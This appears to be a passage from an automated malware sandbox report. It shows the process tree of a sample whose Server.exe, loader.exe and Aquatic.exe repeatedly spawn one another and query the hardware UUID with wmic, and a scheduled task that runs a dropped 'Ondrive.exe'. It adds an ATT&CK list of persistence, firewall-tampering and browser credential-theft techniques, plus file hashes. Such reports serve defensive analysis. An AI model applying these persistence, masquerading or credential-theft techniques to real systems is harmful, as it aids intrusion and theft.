C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"43⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"43⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"44⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"44⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"44⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"45⤵
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid46⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"45⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"45⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"46⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"46⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"46⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"47⤵
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid48⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"47⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"47⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"48⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"48⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"48⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"49⤵
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid50⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"49⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"49⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"50⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"50⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"50⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"51⤵
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid52⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"51⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"51⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"52⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"52⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"52⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"53⤵
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid54⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"53⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"53⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"54⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"54⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"54⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"55⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"55⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"55⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"56⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"56⤵
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"56⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"57⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"57⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"57⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"58⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"58⤵
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"58⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"59⤵
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid60⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"59⤵
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"59⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"60⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"60⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"60⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"61⤵
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid62⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"61⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"61⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"62⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"62⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"62⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"63⤵
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid64⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"63⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"63⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"64⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"64⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"64⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"65⤵
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid66⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"65⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"65⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"66⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"66⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"66⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"67⤵
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid68⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"67⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"67⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"68⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"68⤵
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"68⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"69⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"69⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"69⤵
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {B2F134B0-7ADC-4B1E-B8FB-237A93DAD390} S-1-5-21-4177215427-74451935-3209572229-1000:JSMURNPT\Admin:Interactive:[1]1⤵
-
C:\Users\Admin\AppData\Roaming\Ondrive.exeC:\Users\Admin\AppData\Roaming\Ondrive.exe2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\Ondrive.exeC:\Users\Admin\AppData\Roaming\Ondrive.exe2⤵
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
229KB
MD556c788116da32ec8e9ac3b1b0e66b520
SHA1545f203f2bdf6fac2f131a76a5f36e21637b27ca
SHA256f67268d2659ceb1e8cf8a7560784372294bcd8f249f7c0efdf33216722a5f0bb
SHA5127da85b8e5f92f4a448a10f5c60c21f46b3eb511fda461b15956339ca7130c901e05ad58856a3a3903cdb52b81c4051d3bb0222e87aefab87136351d1ff01734f
-
Filesize
71KB
MD5f9b08bd21b40a938122b479095b7c70c
SHA1eb925e3927b83c20d8d24bdab2e587c10d6ac8cd
SHA256c96cde2e96021c266a202286d644ceb28543d6347e21006d72b29b8a72c505e8
SHA512fcc5784936b7f85a550883c472b99b5edfa7e5c6fd3872fd806b81c2ce1f195ca34342b230a89456066885579fe55aea46d91074ac08af192fbd04ea158473ee
-
Filesize
7KB
MD5b5211156bb5ba4138c9cac1f00c28eac
SHA1998d1c1823742105d11f9401a79525d05fb1481a
SHA2565a7504f2676b8f5f63792624799d52103b75ebb217f0370deb2ff84500687b39
SHA51295f41c52894d02e1499ed709bbf90907726041d152cbead09fc9af71162c66dae15dc5650bcd52571078667c9205dfc6bcc8f1f2c13852841ae1dc53c1f0ac4e
-
Filesize
23KB
MD532fe01ccb93b0233503d0aaaa451f7b2
SHA158e5a63142150e8fb175dbb4dedea2ce405d7db0
SHA2566988ee719a54c93a89303dcff277c62ae4890274cc45f074bc7effde315fbf43
SHA51276945f23a49d594e325d80ffc0570341044ac0b97bd889c92f90bc56d3cdff5c1b29178be4f157c8c1bb9ce7cc311765309f2e6f7b08b24e7acf983ea67635a6
-
Filesize
37KB
MD5b37dd1a1f0507baf993471ae1b7a314c
SHA19aff9d71492ffff8d51f8e8d67f5770755899882
SHA256e58e8918a443c0061add029f8f211f6551a130202195cc2b9b529ea72553e0bc
SHA512ac76d5b10540eb292341f30c7abfd81f03be65f6655c814aba6ac6a0ecf4f0f2c34c3b8e63ceef8c4579f98b7459e51b9fdd30d601c6d1930860ab7c154da460
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
64KB
-
Filesize
256KB
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
96KB
-
Filesize
5.2MB
-
Filesize
4KB
-
Filesize
9.9MB
-
Filesize
9.9MB
-
Filesize
32KB
-
Filesize
256KB
-
Filesize
9.9MB
-
Filesize
9.9MB
-
Filesize
256KB
-
Filesize
96KB
-
Filesize
256KB
-
Filesize
96KB
-
Filesize
256KB
-
Filesize
32KB
-
Filesize
256KB
-
Filesize
64KB
-
Filesize
2.9MB
-
Filesize
32KB